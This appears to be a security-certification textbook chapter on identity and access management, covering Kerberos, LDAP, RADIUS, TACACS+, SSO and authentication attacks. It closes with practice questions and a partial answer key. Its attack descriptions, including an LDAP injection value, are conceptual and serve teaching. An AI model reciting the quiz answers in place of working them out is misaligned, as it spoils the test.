CHAPTER 12

Identity and Access Management

In this chapter you will learn:

•  Various parameters for context-based authentication

•  Security issues and best practices for using common authentication protocols

•  Security issues with various components of the network environment

•  Commonly used exploits against authentication and access systems

The value of identity of course is that so often with it comes purpose.

—Richard Grant

A 2016 study from Shape Security, a Silicon Valley cybersecurity company, asserted that nearly 90 percent of the password attacks on public-facing company portals were done using automated tools to reuse login and password credentials collected from other breaches. This works because we tend to pick passwords that are easy to break, and then reuse the same weak passwords across many sites. Although the reported 2 percent success rate may not seem noteworthy, it becomes a serious concern when we consider events such as the massive 1.5 billion user breach that Yahoo recently suffered. The difficulty with dealing with this scale of attack is that these systems were never meant to provide the visibility for such volume, nor is infrastructure in place to handle the increased demand. An elegant and comparatively low-cost solution to this authentication challenge is to enable and enforce multifactor authentication. This technique of identity assurance requires two or more pieces of information when a user attempts to access a system. Factors fall into three categories: something you know, something you have, and something you are (or something you do). The most effective multifactor systems use factors from at least two of these categories. For example, one factor might be the traditional login and password combination, while another might be a passcode delivered via SMS to a mobile device, or perhaps a biometric feature. Despite using multiple factors for authentication, it’s still a challenge to verify the identity of the person behind the screen. A complementary solution to using multiple factors is the concept of context-based authentication, which aims to make the authentication process more secure by seamlessly and transparently incorporating factors such as location data, time, or even typing patterns. The user is often unaware of these additional factors being validated and processed.

Images

EXAM TIP    Passwords and PINs are examples of something you know. Smart cards, hardware authentication devices, and USB dongles fall into the category of something you have. Something you are and something you do include a biometric characteristic or any other trait inherent to the user such as handwriting or speech pattern.

Security Issues Associated with Context-Based Authentication

Context-based authentication aims to provide increased security and usability by ensuring one or several parameters fall within approved limits, or match historical user data when used in combination with standard login procedures. These parameters include time, IP address, location, device, and biometrics. The goal is to give context to each login event, but doing so requires an upfront investment in infrastructure to generate the identity data required to make the system function. For each parameter that’s part of the process, at least two activities need to happen. The first is the initial cataloging of user data. This might be as straightforward as collecting device information, but data such as biometric measurements are likely to add additional requirements. Depending on where your organization operates, you may have to comply with strict laws regarding the storage and transmission of biometric data, which includes fingerprints, voice recordings, iris scans, and even typing patterns.

The second activity is the comparison and validation process. As with any other type of pattern matching, the challenge here will be to reduce false positives and negatives. It’s not useful to have a robust multifactor system if it prevents legitimate users from getting access to the resources they need in a timely fashion. This process also needs to be speedy enough so that it doesn’t add noticeable wait time for the user. The last thing you want is users circumventing the process because it’s slower than what they’re used to. Although this certainly requires higher cost for setup, the benefits are increased security, flexibility, and usability over traditional methods. When attempting to take advantage of these systems, attackers will often target the individual parameters or flaws within the implementation of the verification of the multiple factors. A very common approach is to provide false information using a method called spoofing, which is simply any action where an unauthorized user presents seemingly legitimate but fabricated data to a system to gain access. We’ll take a deeper look at the various ways attackers try to game systems and the strengths and weaknesses of various context-based authentication techniques in the following sections.

Time

The time parameter in context-based authentication is used to determine the authenticity of a user based on when the activity occurs. It’s a bit of a common-sense test: does it make sense for a user to attempt login when there is no need for it, or when it is outside of business hours? This of course requires that the limits of access be defined, and that location is taken into consideration because of time zone differences. If the time limits are known, this is where an attacker might manipulate input to a system to gain access by pretending to be in a different time zone, for example. Time and location should therefore be closely tied together in preventing unauthorized access. For example, if a user has logged into the system successfully at 10 A.M. GMT from a New York location and attempts to do so again at 11:30 A.M. GMT from a San Francisco location, then you can conclude that this is a suspicious attempt.

Timing can also be brought into the authentication process with the concept of a time window. Some two-factor systems, such as the RSA SecurID mechanism, provide a code to the user during a login attempt, often using a hardware device called a fob, which uses a built-in clock along with a hard-coded secret key to provide continuously changing values. In the case of SecurID, a new code is generated and displayed every 60 seconds. With this device, a user will always have less than a minute to provide the code before it becomes invalid.

Location

Wireless location services began as a public safety mandate issued by the Federal Communications Commission (FCC) in 1996. The agency hoped to provide improved response to emergencies by using the data from cellular service providers to get very accurate location information during 911 calls. It was the commercial potential for location services, however, that motivated many companies and manufacturers to improve accuracy and speed-of-location information on mobile devices. Nowadays, nearly every mobile device is delivered with at least one application that relies on location services. Using location as a parameter for context-based authentication is a common way to prevent many illegitimate login attempts by only accepting requests from known and trusted localities. There are several methods of reporting location from devices, most of which fall into two categories: network-based location and device-based location. Network-based location info is derived from data about the network that the device resides on. By looking up the IP address, for example, you can determine the country, city, and postal code by querying the Internet registry responsible for that block of IP addresses. However, this method has some significant weaknesses because it’s easy to falsify IP addresses. Furthermore, if the attacker has somehow already compromised a device on a trusted network and is using that as a jumping-off point for a larger campaign, then attempting to filter by location in this manner doesn’t help much.

Modern smartphones and laptops use a combination of sensors for location functions. The Global Positing System (GPS) sensors are still the most widely used method for device location reporting. These systems rely on a constellation of satellites to pinpoint the device location anywhere on earth. With three satellites in view, a device can get positing information down to the meter, and with four it’s possible to also get elevation details. Because it’s not always possible to get a direct line-of-sight to GPS satellites at all time, especially in urban areas or indoors, these phones often use a feature called assisted GPS (A-GPS) to improve the accuracy of positing information. Like standard GPS, A-GPS calculates its location data based on the information it gets from its distance from at least three objects of known position, but instead of using the positions of orbiting satellites it relies on those of fixed cellular towers. By combining these two sources, handsets can provide reliable positioning information even in environments where it’s normally difficult to get good connectivity.

An attacker has a few options when it comes to faking positional data. In defending against this, it’s important to understand how location is reported from these devices. The location data is provided to the phones by sensors and is then stored on the device and presented to the authentication server as required. An attacker can either falsify GPS signal data or manipulate the location data on the device itself. The latter requires far less technical expertise and cost. In fact, apps are available for both iOS and Android that will allow a user to easily falsify mobile phone location data. These apps often work only with jailbroken or rooted devices, so one way to ensure legitimate location data is to prevent such modified devices from joining the network.

Frequency

Frequency and speed of login attempts can also provide an important parameter into context-based authentication. Even the most talented programmer has her limits when typing. At peak performance, humans cannot input, interpret, and iterate anywhere near the speed that a machine can. So it’s obvious when machines are performing actions that humans should be doing, particularly during activities such as logging onto a system. This is the idea behind frequency-based authentication parameters. If a system observes SSH login attempts at a rate that doesn’t seem possible, it can then blacklist or throttle that address to prevent further probing. Attackers know that it’s trivial for administrators to implement rate limiting using iptables or similar tools, so they may adjust their attempts to seem more “human like.” Still, many hacking tools (for example, password crackers) put a premium on speed, which gives alert analysts an opportunity to detect many attacks.

Behavioral

Behavioral factors are those based on user interaction with the computer, such as typing rate and mouse movement. A major weakness in traditional password-based authentication systems is that once the session is validated, there are rarely additional attempts to verify that the same user in still in control. Should an attacker hijack a session, he can ride the credentials of the original user to gain unauthorized access. There are several barriers to implementing a continuous authentication solution. For example, it’s likely to annoy legitimate users to have to manually authenticate regularly. The key, therefore, is to make the process unseen to the user.

The Defense Advanced Research Projects Agency calls this process “Active Authentication,” where a learning system generates a “cognitive fingerprint” based on user behavior with their machines. Developing this user profile takes a bit of time, but it’s an effective way to keep attackers out of your systems. As artificial intelligence algorithms become more powerful, however, developing automated ways to simulate human behavior, particularly in terms of object recognition, becomes realistic for a moderately resourced but motivated attacker. Several examples of this evolving cat-and-mouse game have been recently demonstrated by the security research community. In one example, researchers demonstrate automated methods of defeating CAPTCHA tests—the web challenges that aim to differentiate humans from machines by presenting tasks in which a person would have a distinct advantage in solving, such as image or sound recognition. Advances in replicating human behavior will have implications on any behavior-based authentication parameter.

Security Issues Associated with Identities

A digital identity is a distinct representation of a real-world subject within an information system. Most of us have multiple identities, such as the ones we use at work, in social media, and in personal e-mail. Each requires authentication, which is the process (partially described earlier) by which a subject verifies its ownership of a particular identity for the purpose of obtaining authorization to access specific objects or resources. Therein lies the problem: authenticating identities and providing appropriate authorizations require complex mechanisms that can be exploited by savvy adversaries. This challenge is compounded by workforce trends.

As more companies become increasingly decentralized and mobile, the task of identity management (IDM) emerges as a critical part of the overall IT enterprise. Cloud-enabled productivity apps give users the ability to tie in from any location and from any device, but at a cost. The requirements to maintain security and productivity without increasing cost, downtime, and burden to the user make this a challenging effort. Despite advancements in technology, there are still issues that remain in nearly every part of the trust chain, from user to application.

Personnel

People are the core of a business, but they also present the greatest threat to its security posture. Because a computer cannot positively verify a person’s identity and intention, an IDM solution must collect the right information quickly enough to make an accurate decision. Modern solutions use a combination of the previously discussed parameters to deliver quick access to employees and guests, while remaining agile enough to deny access to unauthorized users. Despite the best technological controls, human error still accounts for the preponderance of incidents. People share passwords, lose devices, and fall victim to phishing e-mails regularly. If an attacker can collect all the information that makes a user unique on a network, then it’s trivial for him to pass himself off as that user. User training is the primary method to address the security issues associated with your organization’s members. Referred to as “securing the human” by the SANS Institute, the practice of educating users on the threats and training them to act appropriately in the network environment helps the organization manage risk. Training users on best practices for protecting their credentials and looking for the signs of compromise will improve your organization’s security posture faster than many technological solutions.

Endpoints

Networks exist to reliably exchange information from node to node. Endpoints must be able to verify that they are who they say they are quickly. Endpoint authentication, also known as device authentication, usually relies on values derived from device hardware or operating system configuration. A common mechanism for endpoint authentication is through the key or token generated by the endpoint that is presented to the network or requested resource. Endpoints are particularly vulnerable to abuse regarding authentication because it’s easy to spoof or replay endpoint data.

Images

NOTE    The Media Access Control (MAC) address is a unique value used to identify network-connected devices at the data-link layer of the OSI network model. This value is assigned to a Network Interface Card (NIC) during the manufacturing process, but forging a device’s MAC address is trivial. The ability to change this value is now a built-in part of many operating systems.

Servers

A widely used technique to authenticate servers is through the use of public key certificates defined by the X.509 standard. These digital certificates are issued to the server’s owning organization by a trusted Certificate Authority (CA), which is required to take steps to verify the identity of the requesting organization. These steps often include paying a significant fee as well as providing corporate documents. The process makes it difficult for a threat actor to be issued a certificate for someone else’s organization. Still, it is possible to steal someone else’s certificate, as was allegedly done during the Stuxnet operation. This approach, as it is commonly implemented, only verifies the identity of one end of the connection—typically the server. Even then, it is possible for attackers to insert themselves in the chain and present fake certificates. Though this generates warnings on the clients’ browsers, these messages are oftentimes dismissed by the users.

It is better to mutually authenticate servers and clients, and for this we have the Kerberos authentication protocol. Kerberos is found in nearly all operating systems in one form or another. Like the mythological creature, Kerberos has three key components that are used to challenge during a request for access: the Authentication Service (AS), the Ticket Granting Server (TGS), and the Key Distribution Center (KDC). Figure 12-1 shows the relationship between the client and components of the Kerberos exchange. When the client sends a request to authenticate, the AS will check the KDC database of existing users to verify the user’s existence. If a user is successfully located, the AS will return two messages to the client—one that contains a TGS session key and another that has a Ticket Granting Ticket (TGT). The TGT message has information about the client, a timestamp, and a copy of the TGS session key. It is then encrypted with a symmetrical key, which the client does not have. The other message has some user information and another copy of the TGS session key. This message is encrypted with the user’s secret key, so if the user is not in possession of this key, the client will be unable to read the TGS session key. If the client successfully decrypts the message to get the TGS session key, it can then use that key, along with the TGT, to query the TGS.

Images

Figure 12-1   Relationship between the three “heads” of the Kerberos protocol

At this point, the message that the client sends to the TGS has two parts. The first part is the TGT, which remains encrypted with the secret key. The second part is an authenticator, which has the client ID and is encrypted with the TGS session key (which the TGS does not currently know). The TGS is in possession of the secret key, so it will decrypt the TGT message without a problem. It will use the copy of the TGS session key that it finds in that message to decrypt the authenticator. Now that the TGS can read both messages, it will perform a few steps, such as verify that the tickets haven’t expired and that the authenticator doesn’t already exist. The TGS now prepares two messages similar to how the client originally did. One message will have a service session key that is encrypted with the TGS session key, and the other will have a service ticket that contains a copy of the service session key and is encrypted with a service secret key. The client will be able to decrypt the first message using the stored TGS session key, but will not be able to decrypt the second.

The client will again prepare two messages for the service. The first will be the service ticket, which is still encrypted by the service secret key, and the second message will be an authenticator, which has client data and is encrypted by the service session key. The requested service will then use its service secret key to decrypt the service ticket, revealing the service session key, which it will use to decrypt the authenticator. Finally, if all the user and timestamps check out, the service will return its own authenticator to the client containing a service ID encrypted with the service session key. Because the client machine already has this key, it will decrypt that authenticator message and verify the service ID. From now on, until the ticket expires, the client can use the cached service ticket to continue accessing services.

Kerberos has been in use for decades, and you need to understand some key points about its usage. The KDC database is critical to the integrity of the entire Kerberos system. Failing to properly protect this resource from unauthorized access will expose your organization to significant risk. Furthermore, Kerberos is a solution that must be supported by every node in the network to be effective. Kerberos is only useful on a network where all servers, services, and clients are “Kerberos aware” and support encrypted exchanges. Timing plays a major role throughout the Kerberos authentication process. In all exchanges, timestamps are part of the verification process. Having multiple devices as part of the entire process means that all clocks need to be synchronized. If clocks are too far out of synchronization, Kerberos will not authenticate properly. In the Microsoft implementation of the Kerberos, this value can be set in policy in a setting called “Maximum tolerance for computer clock synchronization.” Best practice dictates that this value doesn’t exceed five minutes.

Images

EXAM TIP    Although you will not be expected to step through a full Kerberos authentication process, you should understand its architecture and use of tickets and symmetric keys.

Services

Masquerading as services is an effective way to phish users into providing sensitive data. At the user level, it’s extremely difficult to detect a fake service. However, there are solutions to ensure the authenticity of a service, depending on the network environment. To prevent abuses by rogue services, Microsoft’s .NET Framework has a feature called Service Identity and Authentication. The Windows Communication Foundation (WCF) infrastructure will ensure that the identity value of the requested service matches a preset value. Figure 12-2 shows the syntax of the identity element in the WCF. When a client attempts to connect to a service using this feature, it will first perform whatever standard authentication procedure is in place. Once the service successfully authenticates to the client machine, it will then compare a stored value called the endpoint identity to the value that the service provides during that interaction. If these match, the client machine can then access the service. Elements of the identity value include certificate information, DNS, RSA value, service names, and user name. This is essentially a second authentication process that happens under the hood.

Images

Figure 12-2   Syntax of the identity element used by the Windows Communication Foundation

Roles

You may recall our discussion about role-based access control in Chapter 3. A blog user, for example, might have the username “tony” and be assigned the role of “editor.” Another user called “karen” might have the role of “admin.” Each user may have multiple simultaneous roles (for example, contributor, editor, and approver), and each role will allow access to certain resources. These access control levels are based on the necessary operations and tasks users need to carry out to fulfill responsibilities within an organization. This approach can be complex because an administrator must translate an organizational authorization policy into permissions when configuring access controls. As the number of objects and users grows within an environment, users are bound to be granted unnecessary access to some objects, thus violating the least-privilege rule and increasing the risk to the company.

Attackers will often attempt to determine which users have elevated permissions based on their roles. Sometimes, users with elevated roles may not be aware of these elevated privileges, which creates a security problem. Auditing roles should be a part of your assessment to ensure that users are only getting the roles necessary for their tasks.

Images

NOTE    In the majority of cases, roles are associated with identities and not authenticated directly. You can think of it as an extension of an identity, describing what kinds of activities can be performed. The relationship may be one-to-many, meaning that a single identity can have multiple roles and invoke the required privileges based on the task.

Applications

Applications are constantly the target of malicious actors looking for ways into a system. Web applications designed to be accessed by the public will restrict what a public user is able to query or execute. Attackers will often try to manipulate the input to these applications to achieve privilege escalation, or elevated access to the target application or operating system. A successful attack is usually the result of a software flaw or misconfiguration. We can use the principles covered in our previous discussion on vulnerability assessment in Chapters 5 and 6 to identify and deal with these vulnerabilities.

Security Issues Associated with Identity Repositories

An identity repository is any resource that stores the credentials necessary to validate a user’s network access. Attackers will often target identity stores to add or change user attributes. Routinely monitoring these repositories for signs of manipulation will alert you to an attacker’s presence.

Directory Services

A directory service server is essentially a central repository for storing and managing information. Administrators rely on directory services to provide management and security options at scale. For the users, directory services allow them to quickly locate network resources without having to remember addresses. Nearly any information about the network can be stored in a directory service data store. Both users and the resources they seek are assigned unique identifiers, and users can often be authenticated and authorized to enterprise services and applications based on this information. Directory services need to be scalable and able to integrate well with various other services on the network.

Active Directory

Active Directory (AD) plays a critical role in many organizations. As the directory service for Windows environments, AD allows organizations to centrally manage resources while providing network security policy. Any user, system, resource, or service in an AD environment is considered an object, which has attributes associated with it, including name and description. The goal of many attackers who target AD environments is to gain a foothold in a network, pivot across systems, and eventually gain access to the AD domain controllers. This type of access would give an attacker complete control over all the objects associated with the organization.

Two primary approaches to protecting these environments are to reduce the attack surface of the AD and to enable auditing functionality. By default, AD has several privileged account groups such as Enterprise Admins (EA), Domain Admins (DA), and Built-in Admins (BA). Using the principle of least privilege (POLP), you should only have the necessary number of administrators active on the network with just the right amount of privilege for day-to-day administration. The second technique for improving AD security is to develop a system for event log monitoring and to enable detailed object auditing. Many incidents can be discovered very early if the right levels of auditing and reporting are enabled. Using advanced features such as Object Access Auditing as part of your directory-wide security policy, you can determine when a sensitive object is accessed or changed, and report those changes as necessary. By default, this value is not enabled, but when combined with a well-designed SIEM solution, it will provide you with speed and flexibility in identifying unusual network behavior before any damage occurs.

Images

EXAM TIP    Under no circumstances should administrative rights to an AD service be shared. Malicious individuals who obtain administrative access to AD domain controllers have total control over the network. Even non-malicious but inexperienced users with access can cause unanticipated problems should they make incorrect configuration changes.

LDAP

Underpinning most directory services in use today is the Lightweight Directory Access Protocol (LDAP). LDAP provides a cross-platform open standard for maintaining directory services on a network. Users can query the LDAP server to get responses based on specifically formatted statements. It’s possible for an attacker to craft statements that trigger the LDAP server to provide additional information not normally authorized for the requester—or worse, to get the server to execute arbitrary code. Suppose that this system allows the requester to search for only a particular kind of resource—in this case, printers and storage devices. Figure 12-3 shows an example of a normal user and her request and response compared to that provided by an attacker. In the legitimate request, the user specifies a search for either storage devices or printers. Note that the attacker formats his query in such a way that when interpreted, the input values appear to be LDAP commands and are executed at a higher level than the user is normally allowed. The system provides the results for all users based on its interpretation of (uid=*).

Images

Figure 12-3   Legitimate LDAP query compared to an LDAP injection query

The key to defending against this type of attack is to validate and sanitize user input to prevent extra commands from being interpreted. You can achieve this by escaping special characters and restricting user input that contains regular expressions.

TACACS+

Terminal Access Controller Access Control System Plus (TACACS+) is an authentication, authorization, and accounting (AAA) protocol that originated with Cisco in the 1990s. As an alternative to Kerberos, TACACS+ uses a client/server approach to determine a user’s access level to anything on the network. At the time of the connection attempt, the user is compared against the user database, and the policy is then applied to that user. With TACACS+, the authentication, authorization, and accounting functions are treated as separate and independent. Though designed to be used primarily for device AAA, the protocol is often used for network AAA functions as well. Despite its strong suitability for network AAA, TACACS+ has some fundamental weaknesses in its protocol. Even though it uses TCP, it is particularly vulnerable to replay attacks because every sequence number always starts with 1. This means that an attacker doesn’t have to guess where the sequence of a legitimate exchange left off because the TACACS+ system will always accept a session beginning with sequence number 1. Additionally, the session IDs are relatively short during TACACS+ exchanges, and the pool of possible IDs is small enough to be vulnerable to so-called “birthday attacks,” or collisions in a cryptographic hash function.

Images

NOTE    Although it shares most of its name with TACACS and XTACACS, the newer TACACS+ is an entirely different protocol that is not compatible with the older authentications methods.

RADIUS

The Remote Authentication Dial-In User Service (RADIUS) is like TACACS+ in that both AAA protocols provide authentication services for administrators and users. However, whereas TACACS+ encrypts usernames and passwords during the authentication process, RADIUS only encrypts user passwords. Additionally, RADIUS uses UDP rather than TCP, meaning that reliability may suffer depending on network state. Because UDP is a best-effort transport protocol, it’s more difficult to determine when faults occur during the transaction. From a security point of view, this means that forging packets in spoofing attempts is easier because there is no confirmation of packet receipt. RADIUS also allows the use of a “shared secret” across the network; therefore, a breach of the entire network is far easier should any one weak endpoint be compromised. This, combined with the lack of complexity (or entropy) of the shared secret, means that offline attacks against the secret are more likely to succeed.

Some implementations of RADIUS are also susceptible to buffer-overflow attacks, which occur when too much data is forced into memory space (or buffer) and the resulting excess spills outside of dedicated memory limits and into other areas of memory. This type of attack against the RADIUS system can be used to exploit arbitrary malicious code, to leak sensitive user data, or as part of a denial-of-service attack.

Security Issues Associated with Federation and Single Sign-On

Federated identity is the concept of using a person’s digital identity to gain access to various services, many times across multiple organizations. The identity is provided by a broker known as the federated identity manager. When verifying her identity, the user needs only to authenticate with the manager, and the application that’s requesting the identity information needs to then trust it as well. Many popular platforms, such as Google, Amazon, and Twitter, take advantage of their large memberships to provide federated identity services for third-party websites, saving the user from having to create separate accounts for each site.

Using a federated identity to provide authentication is often done with Single Sign-On (SSO). In a business setting, a user might have to provide credentials for e-mail services, CRM, directory, or any other business web applications. SSO simplifies the process of logging into multiple systems across a single organization by requiring the user to only maintain a single set of credentials, and it often ties into existing LDAP databases. The primary benefits of using SSO are on both the user and administrator sides. Users only need to remember a single password or PIN, which reduces the fatigue associated with managing multiple passwords. Additionally, they’ll save time from having to reenter credentials for every service desired. For the administrator, this means fewer calls about password problems. Figure 12-4 shows the flow of an SSO request using the Security Assertion Markup Language (SAML) standard, a widely used method of implementing SSO.

Images

Figure 12-4   Single Sign-On flow for a user-initiated request for identity verification

SAML provides access and authorization decisions using a system to exchange information between a user, the identity provider (IDP), and the service provider (SP). When a user requests access to a resource on the service provider, the SP creates a request for identity verification for IDP. The IDP will provide feedback about the user, and the SP can make its decision on an access control based on its own internal rules and the positive or negative response from the IDP. If access is granted, a token is generated in lieu of the actual credentials and passed on to the SP.

Although SSO improves the user experience when accessing multiple systems, it does have a significant drawback in the potential increase in impact should the credentials be compromised. Using an SSO platform thus requires a greater focus on the protection of the user credentials. This is where including multiple factors and context-based solutions can provide strong protection against malicious activity. Furthermore, as SSO centralizes the authentication mechanism, that system becomes a critical asset and thus a target for attacks. Compromise of the SSO system, or loss of availability, means loss of access to the entire organization’s suite of applications that rely on the SSO system.

Manual vs. Automatic Provisioning/Deprovisioning

Provisioning is the coordination of efforts behind creating user accounts on a service and setting the appropriate roles and access associated with them. Part of what makes SSO so desirable for administrators is the ability to create and destroy accounts for services very rapidly. Auto-provisioning is a way to create account on-the-fly as users are authenticated to a new system. Auto-provisioning means that IDP is asserting that the user should be allowed to hold an account with the SP. This clearly requires the SP to trust in the IDP’s validation of users, which is further illustration of the criticality of the IDP in this process. Controlling and consolidating access privileges is not an easy task, but we must be careful to control provisioning functions to control the size of our attack surface. Orphan accounts (those without an assigned owner) and accounts with incorrect levels of access can cause confusion for administrators if not managed correctly.

Self-Service Password Reset

One of the goals for a self-sustaining network is to remove the need for administrator intervention whenever possible. Traditionally, administrators spend an inordinate amount of time dealing with problems such as password resetting. Although it might not be problematic for the administrator of a small business to have a close eye on this type of activity, it becomes challenging as the organization increases in size and complexity. Allowing users to rest their own passwords using an identity manager will allow administrators more time to focus on the rest of the network. However, by removing oversight into the reset process, you provide an opportunity for an attacker to take advantage.

Exploits

Why are authentication systems such a prime target for attackers? To answer this, we must remind ourselves that authentication is the process of validating identity and granting access to some number of resources. Once accepting this information, a system will often make subsequent decisions on the basis of the initial credentials supplied by the client. If an attacker can fool a system with false credentials or stolen credentials, he can assume the user’s identity and perform whatever tasks that user is authorized to do.

Impersonation

At the heart of the challenge is identifying and communicating just the right amount of information to the authentication system to make an accurate decision. These are machines after all, and they will never truly know who we are or what our intentions might be. They can only form a decision based on the information we give them and the clues about our behavior as we provide that data. If an attacker is clever enough to fabricate enough of this user information, he is effectively the same person in the eyes of the authentication system.

Sometimes attackers will impersonate a service to harvest credentials or intercept communications. Fooling a client can be done one of several ways. First, if the server key is stolen, the attacker appears to be the server without the client possibly knowing. Additionally, if an attacker can somehow gain trust as the Certificate Authority from the client, or if the client does not check that the attacker is actually a trusted CA, then the impersonation will be successful.

Man in the Middle

Essentially, MITM attacks are impersonation attacks that face both ways: the attacker impersonates both the client to the real server and the server to the real client. Acting as a proxy or relay, the attacker will use his position in the middle of the conversation between parties to collect credentials, capture traffic, or introduce false communications. Even with an encrypted connection, it’s possible to conduct an MITM attack that works similarly to an unencrypted attack. In the case of HTTPS, the client browser establishes an SSL connection with the attacker, and the attacker establishes a second SSL connection with the web server. The client may or may not see a warning about the validity of the client. In the case that a warning appears, it’s very likely that the victim may ignore or click though the warning, which highlights the importance of user training. It’s possible for the warning to not appear at all, which would indicate that the attacker has managed to get a certificate signed by a trusted Certificate Authority.

Session Hijack

Session hijacking is a class of attacks where an attacker takes advantage of valid session information, often by stealing and replaying it. HTTP traffic is stateless and often uses multiple TCP connections, so it uses sessions to keep track of client authentication. Session information is just a string of characters that appears in a cookie file, the URL itself, or other parts of the HTTP traffic. An attacker can get existing session information through traffic capture, MITM attack, or by predicting the session token information. Capturing and repeating session information is how an attacker might be able to take over, or hijack, the existing web session to impersonate a victim.

Cross-Site Scripting

Cross-site scripting (XSS) is a type of injection attack that leverages a user’s browser to execute malicious code that can access sensitive information in the user’s browser, such as passwords and session information. Because the malicious code resides on the site that the user accesses, it’s often difficult for the user’s browser to know that the code should not be trusted. XSS thus takes advantage of this inherent trust between browser and site to run the malicious code at the security level of the website. XSS comes in two forms: persistent and nonpersistent. With persistent attacks, malicious code is stored on a site, usually via message board or comment postings. When other users attempt to use the site, they unwittingly execute the code hidden in the previously posted content. Nonpersistent attacks, also referred to as reflected XSS, take advantage of a flaw in the server software. If an attacker notices an XSS vulnerability on a site, he can craft a special link, which when passed to and clicked on by other users, would cause the browser to visit the site and reflect the attack back onto the victim. This could cause an inadvertent leak of session details or user information to whatever server the attacker specifies. These links are often passed along through e-mail and text messages and appear to be innocuous and legitimate.

Privilege Escalation

Privilege escalation is simply any action that allows a user to perform tasks she is not normally allowed to do. This is often done by exploiting a bug, implementation flaw, or misconfiguration. Escalation can happen in a vertical manner, meaning that a user gains the privileges of a higher-privilege user. Alternatively, horizontal privilege escalation can be performed to get the access of others in the same privilege level. Attackers will use these privileges to modify files, download sensitive information, or install malicious code.

Rootkits

Rootkits are among the most challenging types of malware because they are specially designed to maintain persistence and root-level access on a system without being detected. As with other types of malware, rootkits can be introduced by leveraging vulnerabilities to achieve privilege escalation and clandestine installation. Alternatively, they might be presented to a system as an update to BIOS or firmware. Rootkits are difficult to detect because they sometimes reside in the lower levels of operating systems, such as in device drivers and in the kernel, or even in computer hardware itself so the system cannot necessarily be trusted to report any modifications it has undergone.

Chapter Review

Recent breaches have highlighted several weaknesses in the authentication systems we use to protect privileged data. The subsequent access to personal and corporate data has resulted in damaging and expensive cybercrimes. The challenge is that attackers often use cracked or stolen user credentials to gain access—credentials that are assumed to come from a legitimate source. The reliance on just a login and password, or single-factor authentication, remains a key issue. Humans are terrible at picking and using passwords. Systems that use context-based authentication methods alongside multifactor authentication provide enhanced protection against malicious actors masquerading as legitimate users. However, as security professionals we must understand some drawbacks to using these systems as we work to make security more usable and transparent to users.

Questions

1.  Which of the following would not be a consideration in context-based authentication?

A.  The one-time passcode used for authentication was incorrect.

B.  The login attempt occurred outside of regular working hours.

C.  The transaction was initiated from a foreign country.

D.  The commands should have been manually entered, but they were issued faster than any human could type.

2.  In order to mitigate the security risks that your staff can pose to identity management, you would consider doing all the following except which one?

A.  Remind users never to share credentials with anyone else.

B.  Provide a demonstration of how their online identities can be stolen.

C.  Force complex passwords that must change every two months.

D.  Disable hyperlinks in e-mail messages.

3.  You are investigating an incident in which a user account in the accounting department appears to have deleted a critical marketing spreadsheet in a shared folder. Each department has its own VLAN and no other files appear to have been affected. The employee owning that user account claims to not know about this. What is the likeliest explanation?

A.  A workstation in the accounting department was probably comprised.

B.  The VLANs are not properly segmented.

C.  The roles associated with the account may have been inappropriate.

D.  The file server was likely compromised.

4.  Which of the following are features of the standard Kerberos authentication protocol? (Choose two.)

A.  It uses asymmetric encryption for authentication.

B.  It uses symmetric encryption for session security.

C.  It requires use of AS, KDC, and TGS.

D.  It requires use of AD, KDC, and GTS.

5.  Which of the following statements is not true of Single Sign-On (SSO) solutions?

A.  They decrease the impact of compromised credentials.

B.  Identities are verified by a federated identity manager or identity provider (IDP).

C.  They are widely implemented using the Security Assertion Markup Language (SAML).

D.  They reduce the number of passwords users have to memorize.

6.  Which of the following exploits is likely to trigger a certificate warning on the victim’s web browser if HTTPS is used in the connection?

A.  Session hijacking

B.  Cross-site scripting

C.  Man-in-the-middle

D.  SQL injection

Use the following scenario and illustration to answer Questions 7–10:

You are investigating a series of potentially unrelated incidents affecting a small business. Four hosts were involved in these events and are illustrated in the simplified network diagram.

Images

7.  The internal server’s logs recorded repeated login attempts to a domain administrator account from an external IP address suspected to be the attacker. These attempts were ultimately successful. The server is a domain controller implementing Kerberos. Which of the following is true?

A.  All objects and subjects in the domain are compromised.

B.  We only know that the internal server is compromised at this point.

C.  Any TGTs for the user at the workstation are now invalid.

D.  The external server will no longer be able to respond to requests from the workstation’s user.

8.  The workstation’s user learns of the compromised server and immediately changes the domain account’s password. Why will this be an ineffective response?

A.  The password would also have to be changed at the external server.

B.  Changing the password will prevent access to the external server.

C.  The password was not compromised, so it need not be changed.

D.  Changing the password will update the information on the compromised internal server, to which the attacker now has full access.

9.  The external server provides virtual private network (VPN) services for remote users. While examining NetFlow data at the firewall, you notice large flows on port 443 from the workstation to a remote user that are correlated to equally large flows on port 443 from the remote user to an external web server. What is likely happening?

A.  The remote user is an attacker who compromised the VPN server, pivoted to the workstation, and is now exfiltrating data.

B.  The remote user is the victim of a cross-site scripting attack.

C.  The remote user is simply visiting the same site as the workstation’s user and uploading similarly large files to it.

D.  The remote user is an attacker who compromised the VPN server and is now conducting a man-in-the-middle attack.

10.  You decide to investigate the VPN server and connect to it over SSH. You use netstat to examine network connections, ps to look at running processes, and search to look for newly created suspicious files. You find nothing out of the ordinary. What can you conclude?

A.  The VPN server appears to be secure and you should allow the remote user to connect again.

B.  You should also look for new user accounts and check your log files before reaching any conclusions.

C.  You can’t reach any conclusions strictly from built-in tools because a rootkit could interfere with their outputs.

D.  There must be a rootkit in play because you know the server was compromised.

Answers

1.  A. One-time passwords are not context sensitive, which means they wouldn’t fall into this type of authentication. The other options allude to issues of time, location, and behavior, all of which can play roles in context-based authentication.

2.  C. Complex and changing passwords may help improve security in many ways, but they will probably also increase the risk imposed by personnel to identity management because users are likely to adopt bad password practices such as writing them down or using variations of previous passwords.

3.  C. The likeliest among the given choices is that the user account had access to the shared folder and the user inadvertently deleted the file. Given that only one file was deleted, it is unlikely that this would indicate a compromise, and even if the VLANs were incorrectly implemented, that should not have allowed that user account to delete the file.

4.  B, C. Though some implementations of Kerberos support the optional use of asymmetric encryption, the standard does not. Furthermore, sessions are always secured using symmetric encryption. The key components of a Kerberos implementation are the Authentication Server (AS), the Key Distribution Center (KDC), the Ticket Granting Server (TGS), and the Service Servers (SS).

5.  A. The main disadvantage of Single Sign-On (SSO) is that compromised credentials will affect multiple systems.

6.  C. A man-in-the-middle attack involving an HTTPS connection will generate a certificate warning on the victim’s browser unless the attacker has stolen the target server’s private key, which is very rare. None of the other exploits will normally generate such warnings.

7.  A. Because Kerberos centralizes secret keys and is implemented domain-wide, all secret keys should be considered compromised at this point since the attacker controls the Kerberos server.

8.  D. The main disadvantage of Kerberos is that it centralizes all the secret keys in the Key Distribution Center (KDC). Any domain password changes and changes to the secret keys will be available to the attacker who now controls the server.

